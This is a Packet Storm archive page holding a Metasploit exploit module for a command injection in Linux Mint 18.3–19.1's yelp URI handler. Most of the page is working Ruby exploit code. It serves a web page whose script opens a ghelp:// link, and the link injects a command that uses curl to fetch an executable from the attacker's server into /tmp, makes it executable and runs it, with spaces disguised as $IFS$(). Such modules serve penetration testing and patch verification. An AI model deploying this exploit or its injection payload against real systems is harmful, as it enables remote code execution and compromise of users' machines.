what you don't know can hurt you

Linux Mint 19.1 yelp Command Injection

Linux Mint 19.1 yelp Command Injection
Posted Jul 1, 2019
Authored by b1ack0wl | Site metasploit.com

This Metasploit module exploits a vulnerability within the "ghelp", "help" and "man" URI handlers within Linux Mint's "ubuntu-system-adjustments" package. Invoking any one the URI handlers will call the python script "/usr/local/bin/yelp" with the contents of the supplied URI handler as its argument. The script will then search for the strings "gnome-help" or "ubuntu-help" and if doesn't find either of them it'll then execute os.system("/usr/bin/yelp %s" % args). User interaction is required to exploit this vulnerability. Versions 18.3 through 19.1 are affected.

tags | exploit, local, python
systems | linux, ubuntu
MD5 | 314957596e0141c5ba05cd2c7a3cd537

Linux Mint 19.1 yelp Command Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# Exploit from github repro: https://github.com/b1ack0wl/linux_mint_poc
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => "Linux Mint 'yelp' URI handler command injection vulnerability",
'Description' => %q{
This module exploits a vulnerability within the "ghelp", "help" and "man" URI handlers within
Linux Mint's "ubuntu-system-adjustments" package. Invoking any one the URI handlers will call
the python script "/usr/local/bin/yelp" with the contents of the supplied URI handler as its argument.
The script will then search for the strings "gnome-help" or "ubuntu-help" and if doesn't find either
of them it'll then execute os.system("/usr/bin/yelp %s" % args). User interaction is required to exploit
this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'b1ack0wl' # vuln discovery and exploit dev
],
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'WfsDelay' => 60
},
'Platform' => 'linux',
'Targets' =>
[
[ 'Linux Mint 18.3 and 19.1',
{
'Arch' => ARCH_X64
}
]
],
'Privileged' => false,
'DefaultTarget' => 0))
end

def generate_exploit_html()
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['LHOST']
else
srv_host = datastore['SRVHOST']
end
@filename = rand_text_alpha(4)
cmd_inj = "curl http://#{srv_host}:#{datastore['SRVPORT']}/#{@service_path} -o /tmp/#{@filename};chmod 777 /tmp/#{@filename};/tmp/#{@filename} &".gsub(' ','$IFS$()') # Cheap way to add spaces since chrome percent encodes spaces (%20).
html = %Q|
<html>
<head>
<meta content="text/html;charset=utf-8" http-equiv="Content-Type">
<meta content="utf-8" http-equiv="encoding">
<title>paparoachfanclubdotcom</title>
</head>
<body>
<script>
lmao = document.createElement('a');
lmao.href= "ghelp://$(#{cmd_inj})";
document.body.appendChild(lmao); /* Needed to work with Firefox */
lmao.click();
</script>
</body>
</html>
|
return html
end

def on_request_uri(cli, request)
agent = request.headers['User-Agent']
if agent =~ /curl\/\d/
# Command has been executed. Serve up the payload
exe_payload = generate_payload_exe()
print_status("Sending payload...")
send_response(cli, exe_payload)
register_file_for_cleanup("/tmp/#{@filename}")
return
else
html = generate_exploit_html()
print_status("Sending HTML...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    19 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close